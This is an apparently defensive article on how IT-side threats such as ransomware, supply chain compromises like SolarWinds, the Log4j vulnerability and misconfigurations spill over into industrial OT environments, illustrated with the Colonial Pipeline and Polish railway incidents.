The impact of IT threats on OT environment
In recent years, cyber threats have been on the rise, not only targeting information technology (IT) systems but also industrial control systems (ICS) and operational technology (OT). Particularly, there has been a surge in incidents impacting ICS/OT.
The threat to industrial organizations’ ICS/OT infrastructure is a new problem that is growing at an accelerated pace. Although IT threats can be severe and cause significant harm to a business, threats to ICS/OT infrastructure can have an even more potent impact, potentially disrupting operations, causing property damage, harming the organization’s reputation, threatening personal safety, demanding ransom, exposing proprietary information to cybercriminals, and bringing the entire business to a standstill.
Historically, industrial organizations have maintained a strict segregation between their IT and ICS/OT systems and departments. This separation enabled each faction to recognize and concentrate on its specific threats, risks, and vulnerabilities. However, the push towards digital transformation and the necessity to interconnect everything has resulted in an increase in IT/OT convergence. This convergence has brought together the threats and risks from both domains.
Inadequate security parameters between IT and OT networks.
It is common for industrial organizations to face cyber attacks aimed at compromising their IT infrastructure. However, these attacks may also have a significant impact on the operational technology (OT) side of the organization’s networks, resulting in a significant increase in risk. Typically, attacks that affect the industrial control systems/operational technology (ICS/OT) first infiltrate the victims’ enterprise networks and subsequently pivot to the ICS/OT environment.
Asset owners must assess the costs, benefits, and risks of integrating or hyperconnecting IT and OT environments, especially in cases where such connections or automation are not essential. OT linked to an IT network can be vulnerable to extremely damaging attacks. Administrative guidelines should be put into place to minimise the risks facing critical systems and networks connected to IT networks.
Over the last few years, the threat of ransomware gangs’ operations has grown considerably.
The adoption of remote work policies by organizations during the COVID-19 pandemic, enabling employees to connect remotely to enterprise infrastructure, is among the factors contributing to the upsurge in ransomware attacks within the industrial sector.
Although ransomware attacks primarily target IT infrastructure, they can also affect OT systems that rely on or are connected to them. By disrupting the IT systems that ICS/OT owners rely on, ransomware gangs can significantly impact business and operational continuity, requiring lengthy recovery periods for organizations. In most cases, the attackers will publicize the stolen data from targeted victims on dark websites to sell it to other criminal groups. This can cause significant reputational harm to the victims, lead to the loss of human life or property, financial losses, the risk of data being exposed to other criminal groups, or the disclosure of their customers’ sensitive information.
The use of Ransomware as a Service (RaaS) as a means of generating financial gains is also growing, with the number of RaaS cybergangs increasing in recent years. In May 2021, the DarkSide ransomware gang targeted the enterprise IT infrastructure of the Colonial Pipeline operation, causing its OT operations to come to a halt. The DarkSide group compromised the company’s domain controllers and then expanded laterally to other IT assets. Due to the inadequate segmentation and lack of visibility of the OT network, the company opted to isolate the attack by suspending OT operations as a precautionary measure to prevent the attacker from gaining access to the OT side of the network. Although the financial repercussions of suspending the Colonial Pipeline operation were substantial, the company recognized that it would be less severe than the consequences if the attacker had been able to penetrate the OT environment.
Supply chain attacks
Supply chain attacks have been a major concern since a state-sponsored campaign that targeted SolarWinds Orion business software was uncovered. This campaign affected around 18,000 organizations, out of a total of 300,000 SolarWinds customers worldwide. For industrial organizations, the risk of the SolarWinds supply chain attack was that many ICS Original Equipment Manufacturers (OEMs) use Orion directly in their products or as white-labeled security products. The attack, known as Sunburst, installed a trojan malware that created a backdoor for hackers to access the systems and networks of SolarWinds’ customers. Furthermore, the attackers could leverage this foothold in the IT infrastructure of entities that downloaded the trojanised software to pivot to the OT network.
Exploitation of vulnerabilities
One tactic that attackers may use to target industrial organizations is exploiting unpatched, publicly-accessible applications in both their IT and OT infrastructures. This method can be highly effective in compromising the victim’s environment while avoiding detection or prevention controls that may be in place against other techniques.
Threat actors capitalise on the buzz surrounding newly disclosed vulnerabilities, making it challenging for cybersecurity firms and government agencies to attribute the attacks to them. An example of this is the successful exploitation of the Log4j vulnerability (CVE-2021-44228) in the industrial sector. Although there have been no reported impacts on OT operations, the exploitation of the vulnerability provides attackers with easy access to the victim’s environment. Adversaries can use this access to disrupt operations or even move laterally to the OT side of the network. In 2021, the total number of IT/OT security vulnerabilities reached a new all-time high of 18,376 by the end of December 2021.
Security misconfiguration and technical failures
The growth of digital transformation and the integration of IT technologies in OT systems pose a significant risk of transferring IT issues to the OT environment. Attack paths and problems that were once confined to IT systems are now becoming a challenge for OT systems as well. The lack of cooperation and understanding between IT and OT operators could compromise the availability, security, and operational functionality of ICS/OT systems. The recent nationwide outage of the Polish railway system in March 2022 serves as a prime example of how IT-centric issues can affect the business and operational continuity of industrial organizations. A coding flaw in the traffic control system at multiple locations across the country led to an outage that lasted over 24 hours impacting rail traffic across the country.
Detecting misconfigured servers, cloud services, and applications that are exposed to the internet is an easy task for hackers, and the resulting risks to infrastructure can be significant. Misconfigurations such as outdated systems, default account settings, weak firewall protection, and improper infrastructure zoning within the environment
has emerged as a major IT security issue in recent years and is one of the top security vulnerabilities.